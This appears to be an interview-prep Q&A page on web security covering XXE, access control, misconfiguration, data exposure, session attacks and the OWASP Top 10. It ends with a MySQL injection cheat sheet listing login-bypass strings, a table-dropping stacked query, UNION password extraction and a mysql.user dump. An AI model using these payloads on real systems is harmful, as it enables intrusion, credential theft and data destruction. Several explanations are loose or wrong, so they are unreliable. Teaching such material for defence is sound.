XML external entity vs Broken Access Control vs Security Misconfiguration

 

Question: What is XML external entity injection?
It allows an attacker to interfere with an application's processing of XML data.
It often allows an attacker to view files on the application server filesystem, and to interact with any back-end.


Question: How do XXE vulnerabilities arise?
Some applications use the XML format to transmit data between the browser and the server.
Applications that do this virtually always use a standard library or platform API to process the XML data on the server.
XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.


Question: What are the types of XXE attacks?

1. Exploiting XXE to retrieve files
2. Exploiting XXE to perform SSRF attacks
3. Exploiting blind XXE exfiltrate data out-of-band, where sensitive data is transmitted from the application server to a system that the attacker controls.
4. Exploiting blind XXE to retrieve data via error messages, where the attacker can trigger a parsing error message containing sensitive data.

Question: How to prevent XXE vulnerabilities
The easiest and most effective way to prevent XXE attacks is to disable dangerous XML features that the application does not need or intend to use.


What is Broken Access Control?
Most of the website/Application have Access controls by Groups. When this functionality was not implemented properly or having loop holes thats Broken Access Control Vulnerablity.
Access control sounds like a simple problem but is insidiously difficult to implement correctly.


How to Protect Yourself from Broken Access Control Vulnerablity?

1. Insecure Id’s : Web applications should not rely on the secrecy of any id’s for protection.
2. Forced Browsing Past Access Control Checks
3. Path Traversal must be there before grant access
4. File Permissions: We should give minimum file access
5. Client Side Caching: Developers should use multiple mechanisms, including HTTP headers and meta tags, to be sure that pages containing sensitive information are not cached by user’s browsers.

Question: What is Security Misconfiguration?
Security Misconfiguration is defined as failing to implement all the security controls for a server or web application, or implementing the security controls.



Give few example of Security Misconfiguration Attack Scenarios?

1. The application server comes with sample applications that are not removed from the production server.
   These sample applications have known security flaws attackers use to compromise the server.
2. Directory listing is not disabled on the server.
3. The application server’s configuration allows detailed error messages, e.g. stack traces, to be returned to users
4. cloud service provider has default sharing permissions open to the Internet by other CSP users.

Question: How to Prevent Security Misconfiguration?

1. Remove sample application that comes.
2. Directory listing must be disabled on the server
3. Disabled default error message dtails
4. Always give least permissions
5. Upto date the servers.
6. Must be unit testing by developer then by QA
7. An automated process to verify the effectiveness of the configurations and settings in all environments.
8. Remove or do not install unused features and frameworks.

What is sensitive data exposure

 

Question: What is sensitive data exposure?
Sensitive data exposure happen when an application OR company exposes users's personal data that might be result of no-encryption, weak encryption, software flaws or upload data to public by mistake.


Question: Example of Attack Scenarios?

1. Someone upload the company data in Facebook/twitter etc by mistake
2. Transfer of data through HTTP/FTP/SMTP without encryption
3. Storing the credit card numbers, health records, personal information (email/phone) storing in database without encryption
4. Encrypting the data with weak cryptographic algorithms or default algorithms
5. Reuse of cryptographic algorithms OR hash
6. Is encryption not enforced, e.g. are any user agent (browser) security directives or headers missing
7. User agent (e.g. app, mail client) not verifying the certificate when received request.

Question: How to Prevent sensitive data exposure?

1. Identify which data is sensitive according to privacy laws, regulatory requirements, or business needs
2. Apply controls as per the classification.
3. Don’t store sensitive data unnecessarily
4. Make sure to encrypt all sensitive data at rest.
5. Ensure up-to-date and strong standard algorithms, protocols, and keys are in place; use proper key management.
6. Encrypt all data in transit with secure protocols such as TLS
7. Disable caching for response that contain sensitive data
8. Store passwords using strong adaptive and salted hashing functions.
9. Verify independently the effectiveness of configuration and settings

Question: Give few popular data breach in history?

1. Sony PlayStation Network: 77 million records compromised in 2010
2. Sony Online Entertainment: 24.6 million records compromised in 2011
3. Evernote: 50 million records compromised in 2013
4. Living Social: 50 million records compromised in 2013
5. Target: 70 million records compromised in 2013
6. eBay: 145 million records compromised in 2014
7. Home Depot: 56 million records compromised in 2014
8. JP Morgan Chase: 76 million records compromised in 2014
9. Anthem: 80 million records compromised in 2015
10. Yahoo: One billion records compromised in 2016
11. Deep Root Analytics: 198 million voter records in 2017

Root Causes of Session Hijacking and Session Fixation and Broken Authentication

Question: What is Session Hijacking?
Session hijacking is an attack where a user session is taken over by an attacker.


Question: What are the Root Causes of Session Hijacking?

1. Guessable session ID
2. Absence of detection mechanism for “repeated guessing trial” either with brute-force or systematic methods.
3. Weak cryptography algorithm
4. Unable to detect repeated guessing trials while there is a mechanism in place
5. Insecure session handling methods
6. Limitation of HTTP: the statelessness of the protocol or lack of any inherent or integrated state management mechanism

Question: What is Session Fixation?
Session Fixation is an attack that permits an attacker to hijack a valid user session.

Question: What are the Root Causes of Session Fixation?

1. Permissive Server: a server that accepts client generated session ID
2. Session management type in use
3. Reuse of session identifiers

Question: What is Broken Authentication?
Attacker get authenticated when he attack on Session Data and get success.

Question: What are the Root Causes of Broken Authentication?

1. Lack of metrics: absence of well-developed metrics
2. Lack of security knowledge among programmers to apply information and communication security mechanisms to their solutions
3. Wrong decisions or compromises
4. Use of self-developed modules instead of well tested and thoroughly analyzed modules for security services such as authentication
5. Storing user credentials with other application data.
6. Guessing Attempts: allowing repeated guessing attempts
7. Lack of security awareness among users.

MySQL - SQL Injection Cheat Sheet

 

Question: What is an SQL Injection Cheat Sheet?
An SQL injection cheat sheet is a resource in which you can find
detailed technical information about the many different variants of the SQL Injection vulnerability.


Question: Give few example SQL Injection Cheat Sheet?
#1 - Add comment in between Query which leads to comments out rest of the query.
Normal Query

SELECT * FROM members WHERE email = 'adminuser' AND password = 'password'; 

tempered Query

SELECT * FROM members WHERE email = 'adminuser'-- AND password = 'password'; 

(In this query will check for username only)


#2 Add comment between some part of query

SELECT id,/* comment here*/ email FROM members WHERE 1 

#3 SQL Injection Attack deleting table

SELECT id email FROM members WHERE email="arun@example.com" ; drop table users

#4 Union Injections - try to get another table data

SELECT id email FROM members WHERE email="arun@example.com" union select email,password from members

#5 Bypassing Login Screens - Un-Authentication login with modify in sql through injection
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--


#6 Get All mysql users with password

SELECT User,Password FROM mysql.user;

#7 Get MySQL version

SELECT @@version

#8 Get all MySQL tables
SELECT * FROM information_schema.tables

#9 Sleep Query
SELECT 10,sleep(100)

OWASP Top 10 Security Risks and Vulnerabilities

Question: What Is OWASP?
Full form of OWASP is Open Web Application Security Project.
It is community which includes small and big IT companies and individual people etc, they provide us Top Vulnerabilities in IT.
Its is not an official standard, it is just a white paper that is used by many organizations, vulnerability bounty programs, and cyber security experts etc

 
Question: What are Top 10 Security Risks and Vulnerabilities?

1. Injection :
   With use of Structured Query Language(SQL), unauthorized person try to get the data which he have not access, modify/delete the data which he have not access.
   
   
2. Broken Authentication :
   With use of Some cookie/Sessions, unauthorized person try to login in the system
   
   
3. Sensitive Data Exposure :
   When we use website with Http URL (unsecured data transmission), data can be read by unauthorized person/organization
   
   
4. XML External Entities :
   Many times organization provide the XML data which is public, Attackers attack on the public data which leads to shut down the server.
   
   
5. Broken Access Control :
   Due to In proper coding/testing, Normal user switch to Admin user by manipulating some param.
   
   
6. Security Mis-configuration:
   Default Server configuration must be need check and update before go live.
   
   
7. Cross site scripting (XSS):
   With use of javascript, Attackers post on malicious code and it damage the server or effect the other users
   
   
8. Insecure Deserialization :
   When we transform the data from one format to another format, sometime data change to dramatically bad.
   
   
9. Using component with Known vulnerabilities :
   When we use the third party component without deep analysis, It can baddly effect of server or application.
   
   
10. Insufficient Logging and monitoring :
    We must add the proper logs to analyse in future